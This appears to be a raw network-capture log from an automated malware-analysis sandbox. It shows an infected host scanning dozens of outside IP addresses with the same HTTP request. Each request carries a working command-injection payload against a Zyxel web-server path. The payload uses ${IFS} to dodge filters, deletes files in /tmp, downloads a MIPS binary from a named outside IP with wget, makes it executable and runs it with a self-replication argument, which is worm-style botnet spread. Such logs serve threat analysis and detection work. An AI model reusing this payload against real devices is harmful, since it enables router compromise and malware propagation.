                                                        Jan 28, 2024 10:12:47.310425043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3106192.168.2.1439088199.73.112.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310477018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3107192.168.2.143698614.25.128.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310506105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3108192.168.2.1440476219.23.145.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310532093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3109192.168.2.1441254167.17.54.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310569048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3110192.168.2.1460366152.175.210.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310621977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3111192.168.2.1437764219.127.152.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310642958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3112192.168.2.1456788115.13.154.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310695887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3113192.168.2.1448884185.7.85.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310758114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3114192.168.2.1450944184.100.64.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310789108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3115192.168.2.1439116129.182.196.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310842037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3116192.168.2.145019014.119.5.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310879946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3117192.168.2.143932048.180.97.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310902119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3118192.168.2.144222812.78.178.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310962915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3119192.168.2.1448306134.226.121.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311002970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3120192.168.2.1450996172.59.24.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311022043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3121192.168.2.144912448.31.36.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311069012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3122192.168.2.1443774181.1.102.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311095953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3123192.168.2.143960424.8.155.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311108112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3124192.168.2.145863025.50.143.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311161995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3125192.168.2.1441036188.132.165.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311211109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3126192.168.2.1455262146.133.117.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311249018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3127192.168.2.1433082160.111.224.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311294079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3128192.168.2.1440338102.251.27.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311312914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3129192.168.2.1458200218.124.157.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311377048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3130192.168.2.1458738223.184.252.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311414003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3131192.168.2.1440960191.253.138.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311455965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3132192.168.2.143806027.23.45.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311517000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3133192.168.2.1449098188.225.47.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311547041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3134192.168.2.1457746175.188.254.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311573982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3135192.168.2.144016696.114.137.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311629057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3136192.168.2.1438960120.139.9.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311652899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3137192.168.2.1444796208.230.165.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311696053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3138192.168.2.144629261.94.34.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311728001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3139192.168.2.1448120161.183.202.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311770916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3140192.168.2.1444766120.88.77.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311803102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3141192.168.2.144434876.119.128.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311816931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3142192.168.2.1437120112.31.253.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311876059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3143192.168.2.1443860183.57.250.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311927080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3144192.168.2.1457950144.245.44.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311969042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3145192.168.2.1440464163.254.172.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.311996937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3146192.168.2.143311286.78.188.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312055111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3147192.168.2.144266473.170.81.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312084913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3148192.168.2.1454046208.199.133.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312119961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3149192.168.2.1455310113.162.106.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312145948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3150192.168.2.1442856148.2.250.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312179089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3151192.168.2.1458912105.76.225.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312218904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3152192.168.2.145544083.218.102.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312247038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3153192.168.2.1449058202.222.131.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312295914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3154192.168.2.14496325.155.196.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312356949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3155192.168.2.145889297.61.124.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312366962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3156192.168.2.14400744.56.228.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312417030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3157192.168.2.1435390182.7.50.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312479973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3158192.168.2.144253271.76.193.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312515020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3159192.168.2.1451220166.218.69.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312534094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3160192.168.2.1453804162.23.54.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312577963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3161192.168.2.1446962166.187.185.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312628031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3162192.168.2.1456128136.192.165.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312655926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3163192.168.2.1450318198.34.65.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312684059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3164192.168.2.1446878122.200.52.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312728882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3165192.168.2.1437552185.99.43.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.312788010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3166192.168.2.1438220161.11.200.183443
                                                        TimestampBytes transferredDirectionData
